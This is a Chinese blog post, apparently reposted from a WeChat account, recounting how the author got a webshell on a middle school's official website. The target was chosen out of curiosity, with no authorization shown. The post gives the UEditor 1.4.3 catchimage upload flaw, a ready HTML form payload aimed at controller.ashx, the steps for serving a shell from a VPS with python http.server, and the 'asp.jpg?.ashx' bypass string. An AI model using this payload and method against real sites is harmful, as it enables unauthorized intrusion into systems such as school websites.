SRC | 记一次走运某校官网Getshell

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

 该文由内部群师傅提供~

|0x01 前言

    某天早上上班,有些没睡醒,随意翻阅着QQ好友列表。咦!这个人头像挺好看的,点开个人资料卡查看,发现上面写着XX中学,善于搜索的我好奇地找到了这个学校的官网。

基于习惯,我点开Wappalyzer浏览器插件,是一个Microsoft ASP.NET写的网站。

图片

|0x02 发现

打开F12,查看JS文件(其实是为了摸鱼,不被领导发现0.0)。

发现ueditor百度编辑器!!!

图片

打开编辑器配置文件ueditor.config.js

找到服务器统一请求接口路径为:net/controller.ashx。

图片

|0x03 验证

在我印象中ueditor1.4.3版本是存在任意文件上传漏洞的,尝试访问公开nday POC链接:

http://xxx/ueditor/net/controller.ashx?action=catchimage&encode=utf-8

漏洞存在!!!

图片

漏洞原因:

controller.ashx文件下只验证ContentType而没纠正文件后缀导致getshell。

有效负载如下,并保存为html格式

<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded"  method="POST">
    shell addr: <input type="text" name="source[]" />
                <input type="submit" value="Submit" />
</form>

在自己的VPS上启动一个简易的HTTP服务,并传马(可以不用图片马,直接改后缀称为jpg)。

图片

VPS使用python启动http服务。

python -m http.server

图片

打开自己VPS的url,查看页面。

图片

打开刚才创建的html,输入框输入http://vps的ip/asp.jpg?.ashx 

点击提交。

图片

上传成功,返回如下

图片

访问shell,文件存在

图片

|0x04 总结

    如果是.net的网站,看一下JS文件是否存在百度编辑器。

欢迎大家关注湘安无事公众号添加助手(wx:shougou1010)进技术交流群

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值